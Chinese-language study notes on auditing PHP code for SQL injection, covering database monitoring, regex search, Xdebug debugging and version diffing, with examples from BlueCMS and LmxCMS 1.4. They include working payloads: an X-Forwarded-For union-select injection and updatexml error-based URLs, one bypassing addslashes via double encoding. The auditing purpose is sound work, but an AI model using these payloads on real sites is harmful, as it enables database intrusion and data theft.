PHP审计：SQL注入类

PHP审计：SQL注入类
漏洞本质：特定函数+可控变量
本章内容：基于SQL注入的代码审计

一.数据库监控

eg.1：QQ业务源码系统-(无过滤)

1.数据库SQL监控排查可利用语句定向分析

2.刷新页面seay数据库监控得到可能存在的变量127.0.0.1

3.找到代码中对应执行的sql语句

4.定位函数ywdd发现XFF头注入
这里可以改变XFF在数据库监控验证变量是否可控

5.构造payload插入数据包：
X-Forwarded-for: 127.0.0.1' and 1=2 union select 1,user(),3,4,5#

二.正则匹配

常用sql注入函数正则匹配，IDE内ctrl+shift+f全局检索
(update|select|insert|delete|).?where.=

eg.2：Bluecms源码系统-(无过滤)

三.动态调试技术

动态调试配置：phpStudy + PhpStorm + XDebug
https://blog.csdn.net/nzjdsds/article/details/100114242
1）先确定PHP版本有Xdebug
2）php.ini配置写入并开启Xdebug
3）PhpStorm设置端口及IDEY并测试
4）PhpStorm开启监听并运行断点访问

四.文件对比技术

工具：Beyond Compare 4

CNVD拿1DAY

eg.3LmxCMS V1.4后台Bo.cl.php文件存在SQL注入漏洞

https://www.cnvd.org.cn/flaw/show/CNVD-2020-59466
过程省略
构造payload：
http://localhost/lmxcms1.4/admin.php?m=book&a=reply&id=1)%20and%20updatexml(0,concat(0x7e,user()),1)%23

eg.4LmxCMS V1.4前台Ta.cl.php存在SQL注入漏洞

https://www.cnvd.org.cn/flaw/show/CNVD-2019-05674

1.定位对应文件以及参数：

2.跟踪定位SQL语句：

3.查看过滤为addslashes，可通过urldecode两次编码绕过:

4.构造payload：
http://localhost/lmxcms1.4/?m=tags&name=a' and updatexml(0%2Cconcat(0x7e%2Cuser())%2C1)%23

5.使用Beyond Compare 4对比1.4与1.41文件代码不同，发现更新版本过滤情况：更新为先过滤，再解码从而规避注入。